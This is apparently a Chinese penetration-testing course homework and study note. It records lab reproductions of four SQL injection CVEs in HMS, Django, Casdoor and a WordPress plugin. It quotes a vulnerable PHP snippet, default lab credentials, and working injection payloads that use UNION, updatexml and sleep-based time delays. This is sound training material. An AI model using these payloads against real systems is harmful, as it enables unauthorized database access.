|
WEB渗透测试工程师系统班250303期 第19节课作业 1.复现课堂讲解的vulfocus注入靶场,截图 第1个:HMS v1.0 SQL注入(CVE-2022-23366) 介绍:医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。该系统或软件将有助于使整个功能无纸化。它将有关患者、医生、员工、医院管理细节等的所有信息集成到一个软件中。它有组成医院的各种专业人员的部分。 HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞。 admin/123456789 原码部分: if(isset($_GET[editid])) { //漏洞触发点 $sql="SELECT * FROM appointment WHERE appointmentid='$_GET[editid]' "; $qsql = mysqli_query($con,$sql); $rsedit = mysqli_fetch_array($qsql); } ?> payload:/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23#查看当前连接用户
第2个:Django SQL注入 (CVE-2022-28346) 介绍:Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 在 2.2.28 之前的 Django 2.2、3.2.13 之前的 3.2 和 4.0.4 之前的 4.0 中发现了一个问题。QuerySet.annotate()、aggregate() 和 extra() 方法会通过精心制作的字典(带有字典扩展)作为传递的 **kwargs 在列别名中进行 SQL 注入。 访问:http://ip:port/demo?field=demo.name POC: http://ip:port/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
第5个:CVE-2022-24124
描述:Casdoor 1.13.1 之前版本中的查询 API 存在与字段和值参数相关的 SQL 注入漏洞,如 api/get-organizations 所示。
POC:/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)
第6个:CVE-2022-0228
描述:插件在使用 orderby 和 order 参数之前没有验证并正确转义它们,这可能会允许高权限用户执行 SQL 注入。
POC:https://example.com/wp-admin/adm ... mp;orderby=email%2c(select+*+from(select(sleep(5)))b)&order=desc
一、笔记标题:WEB渗透系统班-Yakit 靶场结尾&扩展靶场+XSS 漏洞利用
二、文章内容:
1. 课程内容概要
主要知识点1:CVE-2022-23366复现
主要知识点2:CVE-2022-28346复现
主要知识点3:CVE-2022-0228复现
2.重点知识与细节
概念解析
概念1: 无
概念2:
关键步骤
步骤1:先找源码分析⽂章,根据复现⽂章,尝试复现
步骤2:如果遇到了不知道(没接触)的技术点,那么要找⼀些基础的介绍⽂章做了解
步骤3:如果遇到冷⻔漏洞,没有复现⽂章,那么就去找相关的利⽤ poc,通过 poc ⾥⾯给的语句去复现测试。如果 poc ⾥⾯的测试语句也不⽣效,那么需要⾃⼰去 ⼿⼯寻找功能点,在功能点位置去传参!!!
相关代码)
3.实操练习 和 解析
如作业
4.个人总结
本节课最大的收获是:对一些漏洞进行复现
仍然存在疑问的地方:几个漏洞的复现
需要课后深入学习的内容:漏洞复现
|